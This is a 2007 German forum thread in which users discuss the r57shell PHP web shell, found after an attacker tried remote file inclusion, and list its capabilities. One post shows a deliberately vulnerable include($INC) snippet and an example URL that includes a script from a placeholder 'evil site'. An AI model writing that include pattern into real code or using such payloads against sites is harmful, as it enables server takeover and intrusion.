Portal > Foren > Offtopic > Plauderecke > r57shell
Antwort
 
Themen-Optionen Thema durchsuchen
Alt 24.01.2007, 23:01 Nach oben    #1
Benjamin Steininger
 
Benutzerbild von robo47
 
Registriert seit: 02.06.2005
Ort: weiher im tiefsten Odenwald
Beiträge: 1.208
Standard r57shell

Ich bin da gerade zufällig darauf gestoßen, weil jemand versucht hat auf meiner Kiste ein paar Lücken von php-apps auszutesten, eins war ein include einer externen gif-datei! die sich als php-script entpuppte, das ganze ist ein recht nettes Script, nennt sich r57shell und bietet alles was der Hacker begehrt, hier mal ein Screenshot, die buttons werden wohl falsch dargestellt und so ein paar Kleinigkeiten, aber egal. Alles LOKAL getestet, nachdem ich das script angeschaut habe, paar sachen auskommentiert habe etc.

Bietet:
Mailversand
Dateibrowser
Dateisuche
Datenbankzugriff (mysql, postgresql, mssql, oracle) [dumps erzeugen etc]
Dateikomprimierung
Auslesen der php.ini
Anzeigen der phpinfo
Dateien packen
PHP-Code direkt ausführen können
Dateien hochladen
Dateien via ftp hochladen oder woandershinladen
Versucht ob er an den gcc kommt und etwas kompilieren kann
Verschiedene Versuche Scripte (perl + c++) auf nem port lauschen zu lassen (scheint ne Art Shell-Ersatz für Zugriff via Telnet oder ähnliches zu sein)

Ich muss sagen, faszinierend was man in ca 58kb alles reinpacken kann, hab ihr auch schonmal solche tollen Einbruchsversuchscripte entdeckt ?

Bild: http://www.robo47.net/public/r57shell/r57shell.png
robo47 ist offline  
Diesen Beitrag zu to del.icio.us hinzufügen!Diesen Beitrag zu Technorati hinzufügen!Diesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Alt 25.01.2007, 00:55 Nach oben    #2
leftover when bar closes
 
Benutzerbild von dsxs
 
Registriert seit: 29.06.2006
Ort: Bern
Beiträge: 123
Standard

Hier ein wenig ausführlicher: http://www.milw0rm.com/video/watch.php?id=29
__________________
Unkraut ist die Opposition der Natur gegen die Regierung der Gärtner.
ticketbörse

dsxs ist offline  
Diesen Beitrag zu to del.icio.us hinzufügen!Diesen Beitrag zu Technorati hinzufügen!Diesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Alt 25.01.2007, 10:30 Nach oben    #3
Martin Breuer
 
Benutzerbild von WarrenFaith
 
Registriert seit: 17.08.2005
Ort: Berlin
Beiträge: 1.653
Standard

Schon interessant das ganze....
__________________
I did it my way - Senseless-Blog
Weihnachtsgeschenk? Schülern helfen - Bodypainting Kalender für 2009
WarrenFaith ist offline  
Diesen Beitrag zu to del.icio.us hinzufügen!Diesen Beitrag zu Technorati hinzufügen!Diesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Alt 25.01.2007, 10:45 Nach oben    #4
Blubb... öfz
 
Benutzerbild von ljungi
 
Registriert seit: 16.03.2006
Ort: Berlin
Beiträge: 419
Standard

Krass o.O
__________________
Vive la France! Welcome to Sarkoworld...
ljungi ist offline  
Diesen Beitrag zu to del.icio.us hinzufügen!Diesen Beitrag zu Technorati hinzufügen!Diesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Alt 25.01.2007, 11:07 Nach oben    #5
Erfahrener Benutzer
 
Registriert seit: 18.03.2005
Beiträge: 597
Standard

Hab mir eben das Script von r57shell angeguckt, ist schon Hart !
CIX88 ist offline  
Diesen Beitrag zu to del.icio.us hinzufügen!Diesen Beitrag zu Technorati hinzufügen!Diesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Alt 25.01.2007, 11:58 Nach oben    #6
Benjamin Steininger
 
Benutzerbild von robo47
 
Registriert seit: 02.06.2005
Ort: weiher im tiefsten Odenwald
Beiträge: 1.208
Standard

Es zeigt eigentlich sehr gut was für potential hinter einer simplen include via http-lücke steckt das script auf dem server nutzbar und einem steht quasi alles offen.
robo47 ist offline  
Diesen Beitrag zu to del.icio.us hinzufügen!Diesen Beitrag zu Technorati hinzufügen!Diesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Alt 25.01.2007, 11:59 Nach oben    #7
Erfahrener Benutzer
 
Registriert seit: 18.03.2005
Beiträge: 597
Standard

Jo eben, einfach und genial gemacht ...
CIX88 ist offline  
Diesen Beitrag zu to del.icio.us hinzufügen!Diesen Beitrag zu Technorati hinzufügen!Diesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Alt 25.01.2007, 13:11 Nach oben    #8
Ben
Benjamin Klaile
 
Benutzerbild von Ben
 
Registriert seit: 02.12.2004
Ort: Remagen
Beiträge: 4.516
Standard

Zitat:
Zitat von robo47 Beitrag anzeigen
Es zeigt eigentlich sehr gut was für potential hinter einer simplen include via http-lücke steckt
Sorry, was für ein Satz! Vielleicht bin ich zu doof, habe mir das Skript auch nicht angeschaut, aber ... wie meinen?
Ben ist offline  
Diesen Beitrag zu to del.icio.us hinzufügen!Diesen Beitrag zu Technorati hinzufügen!Diesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Alt 25.01.2007, 13:54 Nach oben    #9
Benjamin Steininger
 
Benutzerbild von robo47
 
Registriert seit: 02.06.2005
Ort: weiher im tiefsten Odenwald
Beiträge: 1.208
Standard

Zitat:
Zitat von Ben Beitrag anzeigen
Zitat:
Zitat von robo47 Beitrag anzeigen
Es zeigt eigentlich sehr gut was für potential hinter einer simplen include via http-lücke steckt
Sorry, was für ein Satz! Vielleicht bin ich zu doof, habe mir das Skript auch nicht angeschaut, aber ... wie meinen?
Es zeigt was man mit einem Script alles machen kann, wenn man jemanden findet der ein Script hat, wo man via http und nem parameter was includen kann, das in Kombination mit register_globals, kann z.b. so aussehen:

script.php
PHP-Code:
<?php
include($INC);
?>
script.php?INC=http://www.boeseseite.de/boesesscript.xyz

mfg
robo47
robo47 ist offline  
Diesen Beitrag zu to del.icio.us hinzufügen!Diesen Beitrag zu Technorati hinzufügen!Diesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Alt 25.01.2007, 14:08 Nach oben    #11
Martin Breuer
 
Benutzerbild von WarrenFaith
 
Registriert seit: 17.08.2005
Ort: Berlin
Beiträge: 1.653
Standard

Mit " wäre das nicht passiert
Es zeigt eigentlich sehr gut was für potential hinter einer simplen "include via http"-lücke steckt
__________________
I did it my way - Senseless-Blog
Weihnachtsgeschenk? Schülern helfen - Bodypainting Kalender für 2009
WarrenFaith ist offline  
Diesen Beitrag zu to del.icio.us hinzufügen!Diesen Beitrag zu Technorati hinzufügen!Diesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Alt 25.01.2007, 14:28 Nach oben    #12
Benjamin Steininger
 
Benutzerbild von robo47
 
Registriert seit: 02.06.2005
Ort: weiher im tiefsten Odenwald
Beiträge: 1.208
Standard

Zitat:
Zitat von WarrenFaith Beitrag anzeigen
Mit " wäre das nicht passiert
Es zeigt eigentlich sehr gut was für potential hinter einer simplen "include via http"-lücke steckt
merke ich mir für nächstes mal.
robo47 ist offline  
Diesen Beitrag zu to del.icio.us hinzufügen!Diesen Beitrag zu Technorati hinzufügen!Diesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Alt 25.01.2007, 22:10 Nach oben    #13
Erfahrener Benutzer
 
Benutzerbild von schifti
 
Registriert seit: 06.12.2004
Ort: Bayern
Beiträge: 185
Standard

und vorallem Joomla-Components sind davon betroffen natürlich nur mit register.... Ihr glaubt gar nicht, wieviele Usern täglich gehackt werden d.h. arbeiten
Auch sehr beliebt ist die c99.

Cool ist auch, wenn die Angreifer nichts ändern, aber eine Datei mit einem Redirect zu Maleware hinterlassen und die dann im Spam verlinken....
schifti ist offline  
Diesen Beitrag zu to del.icio.us hinzufügen!Diesen Beitrag zu Technorati hinzufügen!Diesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Alt 26.01.2007, 07:23 Nach oben    #14
Erfahrener Benutzer
 
Registriert seit: 18.03.2005
Beiträge: 597
Standard

Hmmm, bin beim Googlen auf eine Seite gekommen, wo die Besitzer vermutlich noch gar nicht wissen, dass sie eine PHP-Datei mit dem r57shell auf ihren Server haben.
CIX88 ist offline  
Diesen Beitrag zu to del.icio.us hinzufügen!Diesen Beitrag zu Technorati hinzufügen!Diesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Antwort

Lesezeichen


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 
Themen-Optionen Thema durchsuchen
Thema durchsuchen:

Erweiterte Suche

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind an
PingBacks sind an
RefBacks sind aus


Alle Zeitangaben in WEZ +1. Es ist jetzt 08:52 Uhr.


Powered by vBulletin® Version 3.7.4 (Deutsch)
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.2.0

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45